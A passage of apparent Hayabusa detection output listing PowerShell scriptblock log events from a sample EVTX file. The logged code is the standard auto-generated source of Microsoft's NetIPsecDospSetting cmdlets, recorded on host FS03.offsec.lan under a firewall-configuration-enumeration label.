[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] 